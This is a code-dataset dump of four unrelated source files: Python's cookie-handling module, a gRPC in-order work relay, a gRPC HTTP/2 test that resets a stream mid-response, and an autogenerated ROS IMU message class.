Set-Cookie: oreo=doublestuff; Path=/
Each dictionary element has a 'value' attribute, which gives you
back the value associated with the key.
>>> C = cookies.SimpleCookie()
>>> C["twix"] = "none for you"
>>> C["twix"].value
'none for you'
The SimpleCookie expects that all values should be standard strings.
Just to be sure, SimpleCookie invokes the str() builtin to convert
the value to a string, when the values are set dictionary-style.
>>> C = cookies.SimpleCookie()
>>> C["number"] = 7
>>> C["string"] = "seven"
>>> C["number"].value
'7'
>>> C["string"].value
'seven'
>>> C.output()
'Set-Cookie: number=7\r\nSet-Cookie: string=seven'
Finis.
"""
#
# Import our required modules
#
import re
import string
__all__ = ["CookieError", "BaseCookie", "SimpleCookie"]
_nulljoin = ''.join
_semispacejoin = '; '.join
_spacejoin = ' '.join
#
# Define an exception visible to External modules
#
class CookieError(Exception):
pass
# These quoting routines conform to the RFC2109 specification, which in
# turn references the character definitions from RFC2068. They provide
# a two-way quoting algorithm. Any non-text character is translated
# into a 4 character sequence: a forward-slash followed by the
# three-digit octal equivalent of the character. Any '\' or '"' is
# quoted with a preceeding '\' slash.
#
# These are taken from RFC2068 and RFC2109.
# _LegalChars is the list of chars which don't require "'s
# _Translator hash-table for fast quoting
#
_LegalChars = string.ascii_letters + string.digits + "!#$%&'*+-.^_`|~:"
_Translator = {
'\000' : '\\000', '\001' : '\\001', '\002' : '\\002',
'\003' : '\\003', '\004' : '\\004', '\005' : '\\005',
'\006' : '\\006', '\007' : '\\007', '\010' : '\\010',
'\011' : '\\011', '\012' : '\\012', '\013' : '\\013',
'\014' : '\\014', '\015' : '\\015', '\016' : '\\016',
'\017' : '\\017', '\020' : '\\020', '\021' : '\\021',
'\022' : '\\022', '\023' : '\\023', '\024' : '\\024',
'\025' : '\\025', '\026' : '\\026', '\027' : '\\027',
'\030' : '\\030', '\031' : '\\031', '\032' : '\\032',
'\033' : '\\033', '\034' : '\\034', '\035' : '\\035',
'\036' : '\\036', '\037' : '\\037',
# Because of the way browsers really handle cookies (as opposed
# to what the RFC says) we also encode , and ;
',' : '\\054', ';' : '\\073',
'"' : '\\"', '\\' : '\\\\',
'\177' : '\\177', '\200' : '\\200', '\201' : '\\201',
'\202' : '\\202', '\203' : '\\203', '\204' : '\\204',
'\205' : '\\205', '\206' : '\\206', '\207' : '\\207',
'\210' : '\\210', '\211' : '\\211', '\212' : '\\212',
'\213' : '\\213', '\214' : '\\214', '\215' : '\\215',
'\216' : '\\216', '\217' : '\\217', '\220' : '\\220',
'\221' : '\\221', '\222' : '\\222', '\223' : '\\223',
'\224' : '\\224', '\225' : '\\225', '\226' : '\\226',
'\227' : '\\227', '\230' : '\\230', '\231' : '\\231',
'\232' : '\\232', '\233' : '\\233', '\234' : '\\234',
'\235' : '\\235', '\236' : '\\236', '\237' : '\\237',
'\240' : '\\240', '\241' : '\\241', '\242' : '\\242',
'\243' : '\\243', '\244' : '\\244', '\245' : '\\245',
'\246' : '\\246', '\247' : '\\247', '\250' : '\\250',
'\251' : '\\251', '\252' : '\\252', '\253' : '\\253',
'\254' : '\\254', '\255' : '\\255', '\256' : '\\256',
'\257' : '\\257', '\260' : '\\260', '\261' : '\\261',
'\262' : '\\262', '\263' : '\\263', '\264' : '\\264',
'\265' : '\\265', '\266' : '\\266', '\267' : '\\267',
'\270' : '\\270', '\271' : '\\271', '\272' : '\\272',
'\273' : '\\273', '\274' : '\\274', '\275' : '\\275',
'\276' : '\\276', '\277' : '\\277', '\300' : '\\300',
'\301' : '\\301', '\302' : '\\302', '\303' : '\\303',
'\304' : '\\304', '\305' : '\\305', '\306' : '\\306',
'\307' : '\\307', '\310' : '\\310', '\311' : '\\311',
'\312' : '\\312', '\313' : '\\313', '\314' : '\\314',
'\315' : '\\315', '\316' : '\\316', '\317' : '\\317',
'\320' : '\\320', '\321' : '\\321', '\322' : '\\322',
'\323' : '\\323', '\324' : '\\324', '\325' : '\\325',
'\326' : '\\326', '\327' : '\\327', '\330' : '\\330',
'\331' : '\\331', '\332' : '\\332', '\333' : '\\333',
'\334' : '\\334', '\335' : '\\335', '\336' : '\\336',
'\337' : '\\337', '\340' : '\\340', '\341' : '\\341',
'\342' : '\\342', '\343' : '\\343', '\344' : '\\344',
'\345' : '\\345', '\346' : '\\346', '\347' : '\\347',
'\350' : '\\350', '\351' : '\\351', '\352' : '\\352',
'\353' : '\\353', '\354' : '\\354', '\355' : '\\355',
'\356' : '\\356', '\357' : '\\357', '\360' : '\\360',
'\361' : '\\361', '\362' : '\\362', '\363' : '\\363',
'\364' : '\\364', '\365' : '\\365', '\366' : '\\366',
'\367' : '\\367', '\370' : '\\370', '\371' : '\\371',
'\372' : '\\372', '\373' : '\\373', '\374' : '\\374',
'\375' : '\\375', '\376' : '\\376', '\377' : '\\377'
}
def _quote(str, LegalChars=_LegalChars):
r"""Quote a string for use in a cookie header.
If the string does not need to be double-quoted, then just return the
string. Otherwise, surround the string in doublequotes and quote
(with a \) special characters.
"""
if all(c in LegalChars for c in str):
return str
else:
return '"' + _nulljoin(_Translator.get(s, s) for s in str) + '"'
_OctalPatt = re.compile(r"\\[0-3][0-7][0-7]")
_QuotePatt = re.compile(r"[\\].")
def _unquote(str):
# If there aren't any doublequotes,
# then there can't be any special characters. See RFC 2109.
if len(str) < 2:
return str
if str[0] != '"' or str[-1] != '"':
return str
# We have to assume that we must decode this string.
# Down to work.
# Remove the "s
str = str[1:-1]
# Check for special sequences. Examples:
# \012 --> \n
# \" --> "
#
i = 0
n = len(str)
res = []
while 0 <= i < n:
o_match = _OctalPatt.search(str, i)
q_match = _QuotePatt.search(str, i)
if not o_match and not q_match: # Neither matched
res.append(str[i:])
break
# else:
j = k = -1
if o_match:
j = o_match.start(0)
if q_match:
k = q_match.start(0)
if q_match and (not o_match or k < j): # QuotePatt matched
res.append(str[i:k])
res.append(str[k+1])
i = k + 2
else: # OctalPatt matched
res.append(str[i:j])
res.append(chr(int(str[j+1:j+4], 8)))
i = j + 4
return _nulljoin(res)
# The _getdate() routine is used to set the expiration time in the cookie's HTTP
# header. By default, _getdate() returns the current time in the appropriate
# "expires" format for a Set-Cookie header. The one optional argument is an
# offset from now, in seconds. For example, an offset of -3600 means "one hour
# ago". The offset may be a floating point number.
#
_weekdayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
_monthname = [None,
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
def _getdate(future=0, weekdayname=_weekdayname, monthname=_monthname):
from time import gmtime, time
now = time()
year, month, day, hh, mm, ss, wd, y, z = gmtime(now + future)
return "%s, %02d %3s %4d %02d:%02d:%02d GMT" % \
(weekdayname[wd], day, monthname[month], year, hh, mm, ss)
class Morsel(dict):
"""A class to hold ONE (key, value) pair.
In a cookie, each such pair may have several attributes, so this class is
used to keep the attributes associated with the appropriate key,value pair.
This class also includes a coded_value attribute, which is used to hold
the network representation of the value. This is most useful when Python
objects are pickled for network transit.
"""
# RFC 2109 lists these attributes as reserved:
# path comment domain
# max-age secure version
#
# For historical reasons, these attributes are also reserved:
# expires
#
# This is an extension from Microsoft:
# httponly
#
# This dictionary provides a mapping from the lowercase
# variant on the left to the appropriate traditional
# formatting on the right.
_reserved = {
"expires" : "expires",
"path" : "Path",
"comment" : "Comment",
"domain" : "Domain",
"max-age" : "Max-Age",
"secure" : "secure",
"httponly" : "httponly",
"version" : "Version",
}
_flags = {'secure', 'httponly'}
def __init__(self):
# Set defaults
self.key = self.value = self.coded_value = None
# Set default attributes
for key in self._reserved:
dict.__setitem__(self, key, "")
def __setitem__(self, K, V):
K = K.lower()
if not K in self._reserved:
raise CookieError("Invalid Attribute %s" % K)
dict.__setitem__(self, K, V)
def isReservedKey(self, K):
return K.lower() in self._reserved
def set(self, key, val, coded_val, LegalChars=_LegalChars):
# First we verify that the key isn't a reserved word
# Second we make sure it only contains legal characters
if key.lower() in self._reserved:
raise CookieError("Attempt to set a reserved key: %s" % key)
if any(c not in LegalChars for c in key):
raise CookieError("Illegal key value: %s" % key)
# It's a good key, so save it.
self.key = key
self.value = val
self.coded_value = coded_val
def output(self, attrs=None, header="Set-Cookie:"):
return "%s %s" % (header, self.OutputString(attrs))
__str__ = output
def __repr__(self):
return '<%s: %s=%s>' % (self.__class__.__name__,
self.key, repr(self.value))
def js_output(self, attrs=None):
# Print javascript
return """
<script type="text/javascript">
<!-- begin hiding
document.cookie = \"%s\";
// end hiding -->
</script>
""" % (self.OutputString(attrs).replace('"', r'\"'))
def OutputString(self, attrs=None):
# Build up our result
#
result = []
append = result.append
# First, the key=value pair
append("%s=%s" % (self.key, self.coded_value))
# Now add any defined attributes
if attrs is None:
attrs = self._reserved
items = sorted(self.items())
for key, value in items:
if value == "":
continue
if key not in attrs:
continue
if key == "expires" and isinstance(value, int):
append("%s=%s" % (self._reserved[key], _getdate(value)))
elif key == "max-age" and isinstance(value, int):
append("%s=%d" % (self._reserved[key], value))
elif key == "secure":
append(str(self._reserved[key]))
elif key == "httponly":
append(str(self._reserved[key]))
else:
append("%s=%s" % (self._reserved[key], value))
# Return the result
return _semispacejoin(result)
#
# Pattern for finding cookie
#
# This used to be strict parsing based on the RFC2109 and RFC2068
# specifications. I have since discovered that MSIE 3.0x doesn't
# follow the character rules outlined in those specs. As a
# result, the parsing rules here are less strict.
#
_LegalCharsPatt = r"[\w\d!#%&'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]"
_CookiePattern = re.compile(r"""
(?x) # This is a verbose pattern
(?P<key> # Start of group 'key'
""" + _LegalCharsPatt + r"""+? # Any word of at least one letter
) # End of group 'key'
( # Optional group: there may not be a value.
\s*=\s* # Equal Sign
(?P<val> # Start of group 'val'
"(?:[^\\"]|\\.)*" # Any doublequoted string
| # or
\w{3},\s[\w\d\s-]{9,11}\s[\d:]{8}\sGMT # Special case for "expires" attr
| # or
""" + _LegalCharsPatt + r"""* # Any word or empty string
) # End of group 'val'
)? # End of optional value group
\s* # Any number of spaces.
(\s+|;|$) # Ending either at space, semicolon, or EOS.
""", re.ASCII) # May be removed if safe.
# At long last, here is the cookie class. Using this class is almost just like
# using a dictionary. See this module's docstring for example usage.
#
class BaseCookie(dict):
"""A container class for a set of Morsels."""
def value_decode(self, val):
"""real_value, coded_value = value_decode(STRING)
Called prior to setting a cookie's value from the network
representation. The VALUE is the value read from HTTP
header.
Override this function to modify the behavior of cookies.
"""
return val, val
def value_encode(self, val):
"""real_value, coded_value = value_encode(VALUE)
Called prior to setting a cookie's value from the dictionary
representation. The VALUE is the value being assigned.
Override this function to modify the behavior of cookies.
"""
strval = str(val)
return strval, strval
def __init__(self, input=None):
if input:
self.load(input)
def __set(self, key, real_value, coded_value):
"""Private method for setting a cookie's value"""
M = self.get(key, Morsel())
M.set(key, real_value, coded_value)
dict.__setitem__(self, key, M)
def __setitem__(self, key, value):
"""Dictionary style assignment."""
rval, cval = self.value_encode(value)
self.__set(key, rval, cval)
def output(self, attrs=None, header="Set-Cookie:", sep="\015\012"):
"""Return a string suitable for HTTP."""
result = []
items = sorted(self.items())
for key, value in items:
result.append(value.output(attrs, header))
return sep.join(result)
__str__ = output
def __repr__(self):
l = []
items = sorted(self.items())
for key, value in items:
l.append('%s=%s' % (key, repr(value.value)))
return '<%s: %s>' % (self.__class__.__name__, _spacejoin(l))
def js_output(self, attrs=None):
"""Return a string suitable for JavaScript."""
result = []
items = sorted(self.items())
for key, value in items:
result.append(value.js_output(attrs))
return _nulljoin(result)
def load(self, rawdata):
"""Load cookies from a string (presumably HTTP_COOKIE) or
from a dictionary. Loading cookies from a dictionary 'd'
is equivalent to calling:
map(Cookie.__setitem__, d.keys(), d.values())
"""
if isinstance(rawdata, str):
self.__parse_string(rawdata)
else:
# self.update() wouldn't call our custom __setitem__
for key, value in rawdata.items():
self[key] = value
return
def __parse_string(self, str, patt=_CookiePattern):
i = 0 # Our starting point
n = len(str) # Length of string
M = None # current morsel
while 0 <= i < n:
# Start looking for a cookie
match = patt.search(str, i)
if not match:
# No more cookies
break
key, value = match.group("key"), match.group("val")
i = match.end(0)
# Parse the key, value in case it's metainfo
if key[0] == "$":
# We ignore attributes which pertain to the cookie
# mechanism as a whole. See RFC 2109.
# (Does anyone care?)
if M:
M[key[1:]] = value
elif key.lower() in Morsel._reserved:
if M:
if value is None:
if key.lower() in Morsel._flags:
M[key] = True
else:
M[key] = _unquote(value)
elif value is not None:
rval, cval = self.value_decode(value)
self.__set(key, rval, cval)
M = self[key]
class SimpleCookie(BaseCookie):
"""
SimpleCookie supports strings as cookie values. When setting
the value using the dictionary assignment notation, SimpleCookie
calls the builtin str() to convert the value to a string. Values
received from HTTP are kept as strings.
"""
def value_decode(self, val):
return _unquote(val), val
def value_encode(self, val):
strval = str(val)
return strval, _quote(strval)
| gpl-2.0 |
madongfly/grpc | src/python/grpcio/grpc/framework/foundation/relay.py | 23 | 5651 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Implementations of in-order work deference."""
import abc
import enum
import threading
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
_NULL_BEHAVIOR = lambda unused_value: None
class Relay(object):
"""Performs work submitted to it in another thread.
Performs work in the order in which work was submitted to it; otherwise there
would be no reason to use an implementation of this interface instead of a
thread pool.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def add_value(self, value):
"""Adds a value to be passed to the behavior registered with this Relay.
Args:
value: A value that will be passed to a call made in another thread to the
behavior registered with this Relay.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_behavior(self, behavior):
"""Sets the behavior that this Relay should call when passed values.
Args:
behavior: The behavior that this Relay should call in another thread when
passed a value, or None to have passed values ignored.
"""
raise NotImplementedError()
class _PoolRelay(activated.Activated, Relay):
@enum.unique
class _State(enum.Enum):
INACTIVE = 'inactive'
IDLE = 'idle'
SPINNING = 'spinning'
def __init__(self, pool, behavior):
self._condition = threading.Condition()
self._pool = pool
self._own_pool = pool is None
self._state = _PoolRelay._State.INACTIVE
self._activated = False
self._spinning = False
self._values = []
self._behavior = _NULL_BEHAVIOR if behavior is None else behavior
def _spin(self, behavior, value):
while True:
behavior(value)
with self._condition:
if self._values:
value = self._values.pop(0)
behavior = self._behavior
else:
self._state = _PoolRelay._State.IDLE
self._condition.notify_all()
break
def add_value(self, value):
with self._condition:
if self._state is _PoolRelay._State.INACTIVE:
raise ValueError('add_value not valid on inactive Relay!')
elif self._state is _PoolRelay._State.IDLE:
self._pool.submit(self._spin, self._behavior, value)
self._state = _PoolRelay._State.SPINNING
else:
self._values.append(value)
def set_behavior(self, behavior):
with self._condition:
self._behavior = _NULL_BEHAVIOR if behavior is None else behavior
def _start(self):
with self._condition:
self._state = _PoolRelay._State.IDLE
if self._own_pool:
self._pool = logging_pool.pool(1)
return self
def _stop(self):
with self._condition:
while self._state is _PoolRelay._State.SPINNING:
self._condition.wait()
if self._own_pool:
self._pool.shutdown(wait=True)
self._state = _PoolRelay._State.INACTIVE
def __enter__(self):
return self._start()
def __exit__(self, exc_type, exc_val, exc_tb):
self._stop()
return False
def start(self):
return self._start()
def stop(self):
self._stop()
def relay(behavior):
"""Creates a Relay.
Args:
behavior: The behavior to be called by the created Relay, or None to have
passed values dropped until a different behavior is given to the returned
Relay later.
Returns:
An object that is both an activated.Activated and a Relay. The object is
only valid for use as a Relay when activated.
"""
return _PoolRelay(None, behavior)
def pool_relay(pool, behavior):
"""Creates a Relay that uses a given thread pool.
This object will make use of at most one thread in the given pool.
Args:
pool: A futures.ThreadPoolExecutor for use by the created Relay.
behavior: The behavior to be called by the created Relay, or None to have
passed values dropped until a different behavior is given to the returned
Relay later.
Returns:
An object that is both an activated.Activated and a Relay. The object is
only valid for use as a Relay when activated.
"""
return _PoolRelay(pool, behavior)
| bsd-3-clause |
MakMukhi/grpc | test/http2_test/test_rst_during_data.py | 26 | 2707 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import http2_base_server
class TestcaseRstStreamDuringData(object):
"""
In response to an incoming request, this test sends headers, followed by
some data, followed by a reset stream frame. Client asserts that the RPC
failed and does not deliver the message to the application.
"""
def __init__(self):
self._base_server = http2_base_server.H2ProtocolBaseServer()
self._base_server._handlers['DataReceived'] = self.on_data_received
self._base_server._handlers['SendDone'] = self.on_send_done
def get_base_server(self):
return self._base_server
def on_data_received(self, event):
self._base_server.on_data_received_default(event)
sr = self._base_server.parse_received_data(event.stream_id)
if sr:
response_data = self._base_server.default_response_data(sr.response_size)
self._ready_to_send = True
response_len = len(response_data)
truncated_response_data = response_data[0:response_len/2]
self._base_server.setup_send(truncated_response_data, event.stream_id)
def on_send_done(self, stream_id):
self._base_server.send_reset_stream()
self._base_server._stream_status[stream_id] = False
| bsd-3-clause |
JackieJ/UCLA-robomagellan-2011 | glados_sensors/src/glados_sensors/msg/_imu.py | 2 | 3254 | """autogenerated by genmsg_py from imu.msg. Do not edit."""
import roslib.message
import struct
class imu(roslib.message.Message):
_md5sum = "4ed31225b8988ef9b0cd0b234eb0aa9b"
_type = "glados_sensors/imu"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float32 bearing
float32 gx
float32 gy
"""
__slots__ = ['bearing','gx','gy']
_slot_types = ['float32','float32','float32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
bearing,gx,gy
@param args: complete set of field values, in .msg order
@param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(imu, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.bearing is None:
self.bearing = 0.
if self.gx is None:
self.gx = 0.
if self.gy is None:
self.gy = 0.
else:
self.bearing = 0.
self.gx = 0.
self.gy = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
@param buff: buffer
@type buff: StringIO
"""
try:
_x = self
buff.write(_struct_3f.pack(_x.bearing, _x.gx, _x.gy))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
@param str: byte array of serialized message
@type str: str
"""
try:
end = 0
_x = self
start = end
end += 12
(_x.bearing, _x.gx, _x.gy,) = _struct_3f.unpack(str[start:end])
return self
except struct.error as e:
raise roslib.message.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
@param buff: buffer
@type buff: StringIO
@param numpy: numpy python module
@type numpy module
"""
try:
_x = self
buff.write(_struct_3f.pack(_x.bearing, _x.gx, _x.gy))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
@param str: byte array of serialized message
@type str: str
@param numpy: numpy python module
@type numpy: module
"""
try:
end = 0
_x = self
start = end
end += 12
(_x.bearing, _x.gx, _x.gy,) = _struct_3f.unpack(str[start:end])
return self
except struct.error as e:
raise roslib.message.DeserializationError(e) #most likely buffer underfill
_struct_I = roslib.message.struct_I
_struct_3f = struct.Struct("<3f")
| gpl-2.0 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.